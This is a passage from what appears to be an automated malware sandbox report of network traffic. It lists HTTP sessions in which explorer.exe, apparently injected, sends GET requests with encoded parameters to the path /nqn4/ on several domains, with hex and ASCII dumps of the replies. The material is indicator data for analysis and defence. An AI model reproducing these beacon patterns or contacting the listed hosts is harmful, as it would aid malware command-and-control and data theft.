                                                                                          Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 79 66 6f 6f 64 2e 73 74 6f 72 65 2f 3f 66 70 3d 6e 56 69 35 66 54 37 46 42 36 65 66 67 78 76 44 57 59 48 54 32 59 25 32 42 4c 6f 44 68 4b 4f 73 67 71 6a 66 73 4c 51 78 33 37 48 73 70 54 67 55 67 56 30 45 35 55 52 69 32 42 6a 4b 57 6b 34 38 62 4b 42 78 73 49 55 45 74 6c 50 64 4d 41 6f 66 4c 34 63 70 38 35 32 32 25 32 46 32 43 73 6c 66 45 25 32 46 79 38 4c 4f 59 54 64 49 70 6d 35 41 79 41 34 43 79 4e 66 34 63 35 32 58 74 34 74 64 61 50 4d 54 42 52 74 31 38 77 62 7a 6f 68 6d 75 31 46 79 73 37 30 4e 6e 46 39 6f 36 30 56 25 32 46 4c 6a 76 52 73 32 63 79 32 41 35 44 70 31 65 55 7a 45 25 33 44 26 70 72 76 74 6f 66 3d 35 44 6a 48 62 4d 31 67 79 44 38 36 53 75 31 6a 31 25 32 42 79 6f 6a 61 76 44 67 4b 4b 59 47 51 6e 59 34 4f 32 36 6b 76 36 65 30 52 55 25 33 44 26 70 6f 72 75 3d 75 57 70 45 58 63 76 72 6f 6b 36 73 32 30 63 46 50 4d 50 6f 65 44 50 57 55 61 57 39 48 79 6c 6e 75 51 64 61 7a 25 32 42 61 25 32 42 4e 51 4b 48 41 6b 43 62 72 75 25 32 46 32 67 55 7a 34 77 70 59 7a 4d 35 65 76 6f 6a 78 37 7a 69 74 54 31 70 77 77 25 32 42 59 69 67 25 32 42 76 76 70 38 4f 57 38 41 73 64 73 69 46 39 49 77 72 71 6d 71 51 70 55 71 61 59 65 79 57 45 43 6a 66 25 32 46 6b 4c 7a 6d 5a 53 78 65 76 47 77 6f 4b 34 74 71 66 35 52 31 74 44 33 31 37 4e 48 4f 50 78 70 4b 73 52 75 69 78 4b 43 57 36 79 6f 79 4a 71 52 46 4d 76 54 46 41 79 57 51 69 76 4f 78 4c 35 47 71 6d 44 64 49 4f 4b 77 57 52 31 75 45 49 26 63 69 66 72 3d 31 26 54 32 4d 70 77 54 3d 4e 70 76 54 44 73 4c 71 41 4f 30 6d 4b 54 36 25 32 46 70 52 47 59 66 46 42 73 7a 62 33 31 55 7a 44 58 51 52 53 79 68 76 6c 68 38 6e 70 47 6f 72 70 25 32 46 4a 37 35 71 6b 76 6e 5a 71 78 6e 56 75 63 7a 77 54 69 61 46 26 56 44 4b 30 4c 3d 35 6a 5a 68 6a 44 63 68 45 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51
                                                                                          Data Ascii: ...top.location="http://www.buyfood.store/?fp=nVi5fT7FB6efgxvDWYHT2Y%2BLoDhKOsgqjfsLQx37HspTgUgV0E5URi2BjKWk48bKBxsIUEtlPdMAofL4cp8522%2F2CslfE%2Fy8LOYTdIpm5AyA4CyNf4c52Xt4tdaPMTBRt18wbzohmu1Fys70NnF9o60V%2FLjvRs2cy2A5Dp1eUzE%3D&prvtof=5DjHbM1gyD86Su1j1%2ByojavDgKKYGQnY4O26kv6e0RU%3D&poru=uWpEXcvrok6s20cFPMPoeDPWUaW9HylnuQdaz%2Ba%2BNQKHAkCbru%2F2gUz4wpYzM5evojx7zitT1pww%2BYig%2Bvvp8OW8AsdsiF9IwrqmqQpUqaYeyWECjf%2FkLzmZSxevGwoK4tqf5R1tD317NHOPxpKsRuixKCW6yoyJqRFMvTFAyWQivOxL5GqmDdIOKwWR1uEI&cifr=1&T2MpwT=NpvTDsLqAO0mKT6%2FpRGYfFBszb31UzDXQRSyhvlh8npGorp%2FJ75qkvnZqxnVuczwTiaF&VDK0L=5jZhjDchE";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ
                                                                                          Oct 8, 2021 10:01:04.426834106 CEST5722INData Raw: 3d 3d 5f 56 6a 4d 41 61 6b 68 59 6d 31 43 58 49 30 50 49 75 48 66 4d 70 37 37 48 75 33 74 71 6c 36 5a 65 57 6b 62 69 57 49 55 36 32 55 77 42 6d 37 50 4b 6a 4c 33 50 57 45 2b 64 39 6b 7a 77 2b 73 64 75 6d 65 2f 7a 77 72 67 6d 6f 61 66 43 2b 51 58
                                                                                          Data Ascii: ==_VjMAakhYm1CXI0PIuHfMp77Hu3tql6ZeWkbiWIU62UwBm7PKjL3PWE+d9kzw+sdume/zwrgmoafC+QXvd2gsqA=="><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width"><meta http
                                                                                          Oct 8, 2021 10:01:04.426867962 CEST5722INData Raw: 46 39 6f 36 30 56 25 32 46 4c 6a 76 52 73 32 63 79 32 41 35 44 70 31 65 55 7a 45 25 33 44 26 70 72 76 74 6f 66 3d 53 78 6a 6a 31 25 32 46 4d 6f 44 6c 77 6f 72 67 75 46 48 61 57 46 32 45 76 58 61 6b 6a 6b 62 4a 6a 44 70 46 44 41 46 61 50 42 30 34
                                                                                          Data Ascii: F9o60V%2FLjvRs2cy2A5Dp1eUzE%3D&prvtof=Sxjj1%2FMoDlworguFHaWF2EvXakjkbJjDpFDAFaPB044%3D&poru=7WPcO32kchDVEUeW1vuocjsSTLRdBU%2BS7HZmMfTHg368Hkvi7yTI7gpLz9XQ%2FYVTQ7VaQSl9XOg53BuCY%2Fbi7KPLjD725UjEeGGgS0E%2BQ9VtrwOg%2Bs4yPvBlnvHKK%2F4GxjW3IV8OOpP
                                                                                          Oct 8, 2021 10:01:04.461555004 CEST5723INData Raw: 46 39 6f 36 30 56 25 32 46 4c 6a 76 52 73 32 63 79 32 41 35 44 70 31 65 55 7a 45 25 33 44 26 70 72 76 74 6f 66 3d 53 78 6a 6a 31 25 32 46 4d 6f 44 6c 77 6f 72 67 75 46 48 61 57 46 32 45 76 58 61 6b 6a 6b 62 4a 6a 44 70 46 44 41 46 61 50 42 30 34
                                                                                          Data Ascii: F9o60V%2FLjvRs2cy2A5Dp1eUzE%3D&prvtof=Sxjj1%2FMoDlworguFHaWF2EvXakjkbJjDpFDAFaPB044%3D&poru=7WPcO32kchDVEUeW1vuocjsSTLRdBU%2BS7HZmMfTHg368Hkvi7yTI7gpLz9XQ%2FYVTQ7VaQSl9XOg53BuCY%2Fbi7KPLjD725UjEeGGgS0E%2BQ9VtrwOg%2Bs4yPvBlnvHKK%2F4GxjW3IV8OOpP


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          10192.168.2.349872150.95.255.3880C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:02:19.535485983 CEST5850OUTGET /nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.eco1tnpasumo3.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:02:19.810911894 CEST5850INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:02:19 GMT
                                                                                          Server: Apache
                                                                                          Location: http://dfltweb1.onamae.com
                                                                                          Content-Length: 210
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          11192.168.2.349875104.21.66.8680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:02:37.929424047 CEST5860OUTGET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw HTTP/1.1
                                                                                          Host: www.ayushigangwar.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:02:37.960374117 CEST5866INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Fri, 08 Oct 2021 08:02:37 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Fri, 08 Oct 2021 09:02:37 GMT
                                                                                          Location: https://www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P6FKvBCr%2BhYRd7k1eVTFxPvc6%2BtBJQVWRxByzyyDASeaqa8Om%2Fqo866jEbVIgJbVdGfDHMDLbYRRDtqKfy3%2Fa2DO75PFTkwSqKot5eJXegLDP0DN%2FqsN%2FYKPUFCfrAZUBS76wumTXgc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 69add91b1e255c56-FRA
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          12192.168.2.34987634.102.136.18080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:02:43.014415979 CEST5868OUTGET /nqn4/?T2MpwT=74ly5i6dv9aFaIanl04WAUuvBIDqS28RkAjgjYkeNyzOIPYzy6OHh47fS3mwhl7OaPd1&CJBlp=0Brh6Vr8UbBX HTTP/1.1
                                                                                          Host: www.lawsonboards.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:02:43.129717112 CEST5868INHTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Fri, 08 Oct 2021 08:02:43 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 275
                                                                                          ETag: "615f93b1-113"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          13192.168.2.34987766.96.147.11880C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:02:54.608459949 CEST5870OUTGET /nqn4/?T2MpwT=WdqFsCJDDrfJVVKQ96FU4wJF/oM38RLKT57XIM51VttjxsJHubphilqOW6BmhpvfH7LL&CJBlp=0Brh6Vr8UbBX HTTP/1.1
                                                                                          Host: www.alsafi.website
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:02:56.239687920 CEST5871INHTTP/1.1 404 Not Found
                                                                                          Date: Fri, 08 Oct 2021 08:02:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Content-Length: 59030
                                                                                          Connection: close
                                                                                          Server: Apache/2
                                                                                          X-Powered-By: PHP/7.4.10
                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                          Link: <http://ad.aqisolution.com/wp-json/>; rel="https://api.w.org/"
                                                                                          X-Endurance-Cache-Level: 2
                                                                                          Age: 2
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 61 72 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e 6f 2d 6a 73 5c 62 2f 2c 27 6a 73 27 29 7d 29 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 74 69 74 6c 65 3e d8 a7 d9 84 d8 b5 d9 81 d8 ad d8 a9 20 d8 ba d9 8a d8 b1 20 d9 85 d9 88 d8 ac d9 88 d8 af d8 a9 2e 20 26 23 38 32 31 31 3b 20 d8 a7 d9 8a 20 d8 aa d8 ac d8 a7 d8 b1 d8 a9 20 41 54 52 41 44 45 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 64 2e 61 71 69 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 d8 a7 d9 8a 20 d8 aa d8 ac d8 a7 d8 b1 d8 a9 20 41 54 52 41 44 45 20 26 6c 61 71 75 6f 3b 20 d8 a7 d9 84 d8 ae d9 84 d8 a7 d8 b5 d8 a9 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 64 2e 61 71 69 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 d8 a7 d9 8a 20 d8 aa d8 ac d8 a7 d8 b1 d8 a9 20 41 54 52 41 44 45 20 26 6c 61 71 75 6f 3b 20 d8 ae d9 84 d8 a7 d8 b5 d8 a9 20 d8 a7 d9 84 d8 aa d8 b9 d9 84 d9 8a d9 82 d8 a7 d8 aa 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 64 2e 61 71 69 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 2f 63 6f
                                                                                          Data Ascii: <!DOCTYPE html><html dir="rtl" lang="ar" class="no-js no-svg"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script><title> . &#8211; ATRADE</title><link rel='dns-prefetch' href='//ad.aqisolution.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /><link rel="alternate" type="application/rss+xml" title=" ATRADE &laquo; " href="http://ad.aqisolution.com/feed/" /><link rel="alternate" type="application/rss+xml" title=" ATRADE &laquo; " href="http://ad.aqisolution.com/co
                                                                                          Oct 8, 2021 10:02:56.239741087 CEST5873INData Raw: 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22
                                                                                          Data Ascii: mments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source"
                                                                                          Oct 8, 2021 10:02:56.239779949 CEST5874INData Raw: 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 69 3d 30 3b 69 3c 6a 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 63 2e 73 75 70 70 6f 72 74 73 5b 6a 5b 69 5d 5d 3d 65 28 6a 5b 69 5d 29 2c 63 2e 73 75 70
                                                                                          Data Ascii: hing:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.sup
                                                                                          Oct 8, 2021 10:02:56.239819050 CEST5875INData Raw: 74 27 20 69 64 3d 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 6d 61 6c 6c 73 63 72 65 65 6e 2d 72 74 6c 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 64 2e 61 71 69 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e
                                                                                          Data Ascii: t' id='woocommerce-smallscreen-rtl-css' href='http://ad.aqisolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen-rtl.css?ver=4.7.2' type='text/css' media='only screen and (max-width: 768px)' /><link rel='stylesheet'
                                                                                          Oct 8, 2021 10:02:56.239893913 CEST5877INData Raw: 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 75 73 65 73 20 74 68 65 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63
                                                                                          Data Ascii: pe='text/css' media='all' /><![endif]-->... This site uses the Google Analytics by MonsterInsights plugin v 6.2.0 - https://www.monsterinsights.com/ -->... Normally you will find the Google Analytics tracking code here, but the webmaster
                                                                                          Oct 8, 2021 10:02:56.239933014 CEST5878INData Raw: 3a 20 31 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 64 2e 61 71 69 73 6f 6c 75 74 69 6f 6e
                                                                                          Data Ascii: : 1 !important; }</style></noscript><link rel="icon" href="http://ad.aqisolution.com/wp-content/uploads/2017/02/cropped-nnsndsk1-2-32x32.png" sizes="32x32" /><link rel="icon" href="http://ad.aqisolution.com/wp-content/uploads/2017/02/croppe
                                                                                          Oct 8, 2021 10:02:56.239972115 CEST5880INData Raw: d8 aa d8 ac d8 a7 d8 b1 d8 a9 20 41 54 52 41 44 45 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 0d 0a 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d9 84 d9 84 d8 aa d8 ac d8 a7 d8 b1 d8 a9 20
                                                                                          Data Ascii: ATRADE</a></p><p class="site-description"> </p></div>... .site-branding-text --></div>... .wrap --></div>... .site-branding --></div>... .custo
                                                                                          Oct 8, 2021 10:02:56.240036964 CEST5881INData Raw: 2d 37 31 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 64 2e 61 71 69 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 2f 66 61 63 65 62 6f 6f 6b 2f 22 3e d9 81 d9 8a d8 b3 d8 a8 d9 88 d9 83 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 20 69 64 3d 22
                                                                                          Data Ascii: -714"><a href="http://ad.aqisolution.com/facebook/"></a></li><li id="menu-item-87" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87"><a href="http://ad.aqisolution.com/%d8%a7%d8%aa%d8%b5%d9%84-%d8%a8%d9
                                                                                          Oct 8, 2021 10:02:56.240084887 CEST5882INData Raw: 73 69 74 65 2d 6d 61 69 6e 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0d 0a 0d 0a 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 34 30 34 20 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 09 3c 68 65 61 64 65 72 20 63
                                                                                          Data Ascii: site-main" role="main"><section class="error-404 not-found"><header class="page-header"><h1 class="page-title">! .</h1></header>... .page-header -->
                                                                                          Oct 8, 2021 10:02:56.240124941 CEST5884INData Raw: 3e 3c 21 2d 2d 20 2e 73 69 74 65 2d 69 6e 66 6f 20 2d 2d 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2e 77 72 61 70 20 2d 2d 3e 0d 0a 09 09 3c 2f 66 6f 6f 74 65 72 3e 3c 21 2d 2d 20 23 63 6f 6c 6f 70 68 6f 6e 20 2d 2d 3e 0d 0a 09 3c 2f 64
                                                                                          Data Ascii: >... .site-info --></div>... .wrap --></footer>... #colophon --></div>... .site-content-contain --></div>... #page --><script type="text/javascript">(function () {var c = document.body.className;c = c.replace(/


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          14192.168.2.349878150.95.255.3880C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:00.697197914 CEST5884OUTGET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX HTTP/1.1
                                                                                          Host: www.eco1tnpasumo3.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:03:00.985574007 CEST5885INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:03:00 GMT
                                                                                          Server: Apache
                                                                                          Location: http://dfltweb1.onamae.com
                                                                                          Content-Length: 210
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          15192.168.2.3498795.77.41.13680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:06.081476927 CEST5886OUTGET /nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&CJBlp=0Brh6Vr8UbBX HTTP/1.1
                                                                                          Host: www.alhudadevelopers.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
